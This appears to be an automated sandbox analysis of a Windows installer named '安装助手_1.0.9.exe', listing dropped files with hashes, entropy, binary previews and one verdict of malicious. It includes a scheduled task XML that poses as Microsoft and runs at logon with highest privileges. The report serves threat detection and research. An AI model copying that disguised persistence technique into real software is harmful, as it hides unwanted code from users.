                                  Malicious:false
                                  Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.
                                  Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):74960
                                  Entropy (8bit):7.99759370165655
                                  Encrypted:true
                                  SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                                  MD5:950338D50B95A25F494EE74E97B7B7A9
                                  SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                                  SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                                  SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                                  Malicious:false
                                  Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...
                                  Process:C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                                  File Type:7-zip archive data, version 0.4
                                  Category:dropped
                                  Size (bytes):74960
                                  Entropy (8bit):7.997593701656546
                                  Encrypted:true
                                  SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                                  MD5:059BA7C31F3E227356CA5F29E4AA2508
                                  SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                                  SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                                  SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                                  Malicious:false
                                  Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.
                                  Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):29730
                                  Entropy (8bit):7.994290657653607
                                  Encrypted:true
                                  SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                                  MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                                  SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                                  SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                                  SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                                  Malicious:false
                                  Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.
                                  Process:C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                                  File Type:7-zip archive data, version 0.4
                                  Category:dropped
                                  Size (bytes):29730
                                  Entropy (8bit):7.994290657653608
                                  Encrypted:true
                                  SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                                  MD5:A9C8A3E00692F79E1BA9693003F85D18
                                  SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                                  SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                                  SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                                  Malicious:false
                                  Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8
                                  Process:C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                                  File Type:7-zip archive data, version 0.4
                                  Category:dropped
                                  Size (bytes):249984
                                  Entropy (8bit):7.999161200123717
                                  Encrypted:true
                                  SSDEEP:6144:BBfinFeH/n/oxa9p5nKMF7W9uvN/jl3eTYjg0c+YRRbMQL:BBfiFePQxa9pFhYmN/S0rgRZ
                                  MD5:7A1992BF55B34786E192E7FF0E870B6C
                                  SHA1:CF5E5EB0C9133A9E6162731440462B88191F4672
                                  SHA-256:187BCFD1E40E2DF985E8F3456ECC94347C608C8151BF7F1A4524D66B118A7B60
                                  SHA-512:48792B91D46D070A6B4D97D072CCF302452C163A5576D419398FAD3D958ADF19B5739BC026068984C149F20051CBEB0DAB91EFF47468E6AD7EBEB2B08003F29D
                                  Malicious:false
                                  Preview:7z..'...;.(J .......@.......>.~..r"&9.d.[|6..]T..a.]...4..6.......I".w....s...V...l..;B..?..'.5.y.."..8. .?YM....9.]..^.....!..8C$..=1... 3..V.}.e3._.............UI...m..%....jl....g..~O....R..#|.7.M....h.<....X(yCa...).5..\8.......= zg....?U..8...9.]B}...dWm>.|../..=..@.. ....@O..H|.C*..oe.H...;..`.t..a....p.$...Y-n.7{..XX.G.Ex.|.>.`.(G..e.Lz......]r....?.....x.B.g..5....\.......h...:u...6...q.........f|.L....z.~..s..X.]...G<k&....."c9...}..&.t!...<.+.#..2..w.<........T..7...%..4........ly!.f....d...}...(P...O.EHU|i9...a.'%...X.4...W...#....[....>..TD"}...|.].Np..E=b...d3...l....K..9%;.0...........R+..fQ...#0...`...J.......YEtk-...7......=k...b;.H&...^(\t....Qg..2.....z...tb.h..W.u..'.=..u..h_H. W.../.Y...7.....n.'p.Ys.uV<m#....K#.#;.0B..b&=9..Q./7..L.;.=3...8i.=2M.<.............Y.h._.E...Ft..TS.....=....O.*...E....y..........z,..F..1.K...d..l.CYE.x..E@...O\.fQ.....C.j#..B.x.Qs.?..N34'....'.S<.....gC!x.........0......`...((6Di... F|.
                                  Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):63640
                                  Entropy (8bit):6.482810107683822
                                  Encrypted:false
                                  SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                                  MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                                  SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                                  SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                                  SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 9%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................
                                  Process:C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):4096
                                  Entropy (8bit):3.344834847024567
                                  Encrypted:false
                                  SSDEEP:48:dXKLzDlnbL6w0QldOVQOj933ODOiTdKbKsz72eW+5y4:dXazDlnKwhldOVQOj6dKbKsz7
                                  MD5:7F252B19B6E96247184F55570325E9FA
                                  SHA1:E6D4AD432CB4864C0E1A08FB15255F7973807B3D
                                  SHA-256:84460DE817C9A6637650C7ED83D15DD14836FB841FF9790D4F2D1A8D6BAAB0ED
                                  SHA-512:A5741E4F5095BB24A28E5909CC659CB53535BD1E7A2555FA9D2660155F8CA80F96136E2CA589CCD2154FCF264B8FD525782B8C9752022B986F20D3F1454496EF
                                  Malicious:false
                                  Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvai
                                  Process:C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                                  File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):5649408
                                  Entropy (8bit):6.392614480390128
                                  Encrypted:false
                                  SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                                  MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                                  SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                                  SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                                  SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):64
                                  Entropy (8bit):1.1628158735648508
                                  Encrypted:false
                                  SSDEEP:3:Nlllul5mxllp:NllU4x/
                                  MD5:3A925CB766CE4286E251C26E90B55CE8
                                  SHA1:3FA8EE6E901101A4661723B94D6C9309E281BD28
                                  SHA-256:4E844662CDFFAAD50BA6320DC598EBE0A31619439D0F6AB379DF978FE81C7BF8
                                  SHA-512:F348B4AFD42C262BBED07D6BDEA6EE4B7F5CFA2E18BFA725225584E93251188D9787506C2AFEAC482B606B1EA0341419F229A69FF1E9100B01DE42025F915788
                                  Malicious:false
                                  Preview:@...e................................................@..........
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):6144
                                  Entropy (8bit):4.720366600008286
                                  Encrypted:false
                                  SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                  MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                  SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                  SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                  SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):3598848
                                  Entropy (8bit):7.004949099807939
                                  Encrypted:false
                                  SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                  MD5:1D1464C73252978A58AC925ECE57F0FB
                                  SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                  SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                  SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                  Malicious:false
                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):3366912
                                  Entropy (8bit):6.530548291878271
                                  Encrypted:false
                                  SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                  MD5:9902FA6D39184B87AED7D94A037912D8
                                  SHA1:F5D8470ACF5DFF81C6D3364A8943B24E3DB48D95
                                  SHA-256:43D9F1FA3BDA81C618CC23FBB4E9D8551305AF0090A3D452C4070F938F6BCFAC
                                  SHA-512:BC97E2C379C464F821AF0E38630DB65165F4E91A1105A3C7DABCC5E61CC9EAAB1522AC82E749AA4FEFC5A9E21A295A0A59CFE99D6BC3980F9C89F00AF5B8CF75
                                  Malicious:true
                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                  Process:C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):6144
                                  Entropy (8bit):4.720366600008286
                                  Encrypted:false
                                  SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                  MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                  SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                  SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                  SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):3598848
                                  Entropy (8bit):7.004949099807939
                                  Encrypted:false
                                  SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                  MD5:1D1464C73252978A58AC925ECE57F0FB
                                  SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                  SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                  SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                  Malicious:false
                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):3366912
                                  Entropy (8bit):6.530548291878271
                                  Encrypted:false
                                  SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                  MD5:9902FA6D39184B87AED7D94A037912D8
                                  SHA1:F5D8470ACF5DFF81C6D3364A8943B24E3DB48D95
                                  SHA-256:43D9F1FA3BDA81C618CC23FBB4E9D8551305AF0090A3D452C4070F938F6BCFAC
                                  SHA-512:BC97E2C379C464F821AF0E38630DB65165F4E91A1105A3C7DABCC5E61CC9EAAB1522AC82E749AA4FEFC5A9E21A295A0A59CFE99D6BC3980F9C89F00AF5B8CF75
                                  Malicious:true
                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                  Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                  File Type:ASCII text, with CRLF, CR line terminators
                                  Category:dropped
                                  Size (bytes):406
                                  Entropy (8bit):5.117520345541057
                                  Encrypted:false
                                  SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                                  MD5:9200058492BCA8F9D88B4877F842C148
                                  SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                                  SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                                  SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                                  Malicious:false
